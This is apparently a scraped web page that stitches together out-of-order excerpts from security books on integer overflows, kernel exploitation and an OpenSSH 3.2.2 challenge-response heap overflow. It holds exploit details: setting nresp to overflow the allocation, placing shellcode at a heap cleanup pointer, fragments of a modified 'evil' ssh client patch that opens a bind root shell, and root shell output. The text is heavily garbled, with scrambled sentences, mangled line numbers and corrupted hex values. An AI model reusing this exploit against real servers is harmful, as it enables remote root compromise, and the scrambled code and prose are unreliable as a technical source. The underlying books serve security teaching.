The most common software faults leading to memory errors are off-by-one, integer, and buffer overflow. Memory errors usually derive from the exploitation of vulnerabilities (depicted as holes in a wall in Figure 21.1) existing in a given application due to software faults introduced during the software’s implementation. Juan Carlos Ruiz, in Emerging Trends in ICT Security, 2014 Memory errors Security through Emulation-Based Processor Diversification This exploit then proceeds to copy the shellcode directly onto the heap in hopes that it will be executed by the SSH cleanup functions, which is the case most of the time. OpenSSH uses many function pointers that are found on the heap following the allocated buffer. At the same time, the the loop continues to copy data past the allocated buffer onto the heap space. This exploit sets the value of the nresp variable to 0x40000400, causing malloc to allocate 4096 bytes of memory. Here is a full exploitation example using a modified ssh client containing exploit code: }Ĩ3 input_userauth_info_req(int type,u_int32_t seq,void *ctxt)ĩ2 * Begin to build info response packet based on prompts requested.ĩ3 * We commit to providing the correct number of responses,so ifĩ6 packet_start[SSH2_MSG_USERAUTH_INFO_RESPONSE) ġ02 + packet_put_string( shellcode, 2047 ) ġ06 debug2(“input_userauth_info_req: num_prompts %d”, num_prompts) sin_f araily = AF_INET Ĥ4 + do_syscall( 3, 104, server_sock,(struct sockaddr *) &server_addr,Ĥ7 + client_sock = do_syscall( 3,30,server_sock,(struct sockaddr *)ĥ2 + *(int *)(rootshell + 0)= 0圆E69622F ĥ3 + *(int *)( rootshell + 4 )= 0x0068732f ĥ8 + do_syscall( 3,59, rootshell, argv, envp ) Ħ1 +int do_syscall( int nb_args,int syscall_num. ) ģ8 + char rootshell,*argv, *envp Ĥ0 + server_sock = do_syscall( 3,97, AF_INET, SOCK_STREAM,0 ) Ĥ3 + server_addr. If the sploit worked, you can connect to port 128 in another terminal:Ģ3 uid=0(root) gid=0(wheel) groups=0(wheel)Ģ5 - sshconnect2.cSun Mar 31 20:49:39 2002Ģ6 + + + evil-sshconnect2.c Fri Jun 28 19:22:12 2002Ģ9 * parse INFO_REQUEST, prompt user and send INFO_RESPONSEģ2 +int do_syscall( int nb_args,int syscall_num. configure & make sshġ5 ~/openssh-3.2.2pl $. Apply the patch provided below by running:ħ ~/openssh-3. This is trivial to accomplish and is performed by populating the heap space and copying assembly instructions directly.ġ 1. We can therefore cause arbitrary code execution by placing shellcode at the heap address 0圆2000. By placing shellcode at one of these addresses, you can cause code execution, yielding remote root access.Įxample output from sshd running in debug mode (sshd -ddd):ĭebug 1 : auth2_challenge_start : trying authentication method ‘bsdauth* Postponed keyboard-interactive for test from 127.0.0.1 port 19170 ssh2 buffer_get: trying to get more bytes 4 than in buffer 0 debugl: Calling cleanup 0圆2000(0x0) All of these function pointers call code that is on the heap. OpenSSH uses a multitude of function pointers for cleanup functions. Exploitation detailsĮxploitation of this vulnerability is quite trivial. OpenSSH then proceeds to place values into the allocated pointer array (lines 4 through 6), dictated by the value of nresp (line 4), causing heap space to be overwritten with arbitrary data. Specifying a large number for nresp, such as 0x40000400, prompts an integer overflow, causing xmalloc to allocate only 4096 bytes of memory. By modifying this value, one can change the amount of memory allocated by xmalloc (line 3). Kaioc(long a0, long a1, long a2, long a3, long a4, long a5)Įrror = aiosuspend((void *)a1, (int)a2, (timespec_t *)a3, Īiosuspend(void *aiocb, int nent, struct timespec *timout, int flag, long *rval, int run_mode)ģ response - xraalloc (nresp * sizeof(char*}) Īn attacker has the ability to change the value of nresp (line 1) by modifying the code in the OpenSSH client. As an example, take a look at the following code (taken from a vulnerable path that affected the OpenSolaris kernel 6 the code is condensed here to improve readability): Integer overflows are the consequence of “wild” increments/multiplications, generally due to a lack of validation of the variables involved. In practice, this usually translates to a wrap of the value if an unsigned integer was used and a change of the sign and value if a signed integer was used. The C standard defines this situation as undefined behavior (meaning that anything might happen). Enrico Perla, Massimiliano Oldani, in A Guide to Kernel Exploitation, 2011 (Arithmetic) Integer OverflowsĪn integer overflow occurs when you attempt to store inside an integer variable a value that is larger than the maximum value the variable can hold.
0 Comments
Leave a Reply. |